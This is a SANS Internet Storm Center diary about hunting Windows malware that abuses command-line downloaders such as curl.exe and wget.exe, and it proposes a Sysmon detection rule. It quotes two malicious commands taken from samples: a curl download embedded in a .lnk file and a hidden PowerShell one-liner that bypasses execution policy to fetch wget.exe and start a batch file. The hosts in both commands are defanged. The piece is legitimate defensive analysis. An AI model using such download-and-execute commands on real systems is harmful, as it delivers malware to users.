Keep an Eye on Command-Line Browsers, (Fri, Feb 14th)

This post was originally published on this site

For a few weeks, I’m searching for suspicious files that make use of a command line browser like curl.exe or wget.exe in Windows environment. Wait, you were not aware of this? Just open a cmd.exe and type ‘curl.exe’ on your Windows 10 host:

If tools like bitsadmin.exe are well-known to be (ab)used by malware samples[1], today, less attention is given to command-llne browsers like curl.exe or wget.exe. Those tools are powerfull (see my diary about many curl features[2]) and, in my opinion, deserve to be kept under your hunting rules.

I’m hunting for samples on VT that use one of those two browsers and I found a bunch of them:

Most of them are PE files and the average detection score is 16.

Win32 EXE 208
ZIP 40
RAR 12
Windows Installer 9
CAB 3
MS Word Document 3
DOS EXE 2
Windows shortcut 2
Android 1
Win32 DLL 1
unknown 1

Some of them are very simple but effective. Here is an example of command embedded in a malicious .lnk file :

C:WindowsSystem32cmd.exe /c curl.exe hxxp://87[.]57[.]141[.]215/Cell.png -o C:WindowsTasksCell.png

If curl.exe is available as a standard tool in latest Windows operating systems, don’t forget that tools can be installed via 3rd party applications or packages. I searched across many Windows devices and found alternatives:

(Via GNU tools)
C:Program Files (x86)GnuWin32binwget.exe
 
(Via MingW)
C:PGMGitmingw64bincurl.exe
 
(Or Cygwin)
C:Program FilesCygwinbinwget.exe

Sometimes, if no command-line browser is not available, the sample just downloads its own copy. Example:

C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -ExecutionPolicy bypass 
    -noprofile -windowstyle hidden 
    (new-object system.net.webclient).downloadfile('hxxp://www[.]kuaishounew[.]com/wget.exe','wget.exe'); 
&start start2.bat

I found very old samples that used wget.exe to fetch malicious files (one from 2015!) but today we have powerful tools to keep an eye on such tools, a Sysmon rule can be helpful to track them:

<Image condition="contains any">wget.exe;curl.exe</Image>

Happy hunting!

[1] https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675
[2] https://isc.sans.edu/forums/diary/Exploiting+the+Power+of+Curl/23934

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.